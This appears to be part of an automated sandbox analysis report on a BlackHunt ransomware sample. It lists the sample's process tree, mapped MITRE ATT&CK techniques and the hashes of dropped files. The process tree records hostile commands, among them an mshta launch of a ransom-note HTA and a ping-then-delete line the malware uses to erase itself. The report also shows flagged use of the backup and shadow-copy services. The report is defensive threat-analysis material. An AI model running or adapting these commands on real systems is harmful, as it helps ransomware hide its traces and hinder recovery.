C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:14592 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:1140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1140 -s 14644⤵
- Program crash
PID:6348
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\d6af8e1ae0318246afe2866bb193f06cd5ca7dde9e5e80379b670152cc5ad553.exe"2⤵PID:14500
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:9068
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4416
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:2804
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:14452
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:7436
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:10932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 1140 -ip 11401⤵PID:12628
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5beff51394f2a265d84dcf6c08a37828c
SHA129a5c5c0d6a8c5583395ede09671e8300bc9ce2c
SHA2564d86668acaa710863bdf9d71a8d51e66504a4f3ed3a5f91769a0f005681e3c76
SHA5121b8c337112bf17fe966e8c08bd3d126e729128bf9eb1d457d048dd87ef3a011179f4212ecfc8f09328ed1373145ee0f9449bfbd0ff49fa2fc6a2e5ac82b2f04d
-
Filesize
12KB
MD5178c13079bbc78f331829533300fffd5
SHA1483c4dcd93bc53346add7938a2340523e9041e62
SHA2561a7dd2cb70e535a91341ede441e4a9f51cdb8accb9993c28d9651b819ca9e87c
SHA51219b11bbf128399f4570898a0b0adcfd2ae54c7687777efd5fc3fd33d0e5c5c3e5ef5321658665f3efc939bf07b71f425d73822f014a3126546713f72a28c3cfd
-
Filesize
684B
MD5a00aa1446ce87842d7e699960bacec67
SHA1ddeca158a5c64d9f06ae7c6313036b7d8d3edd86
SHA2565fe562b84c22c72ed18fd0d5a28edceac90259ec8c47ac621cb0ee5c50e1e282
SHA512b03b7121bfdf22c97a80f192ec0dca89c10bb999a34fac24b6add81006b71a6fcb14a952ef870c53ef967d9510623e776cb04118fd4189a8a7594bfa850dd949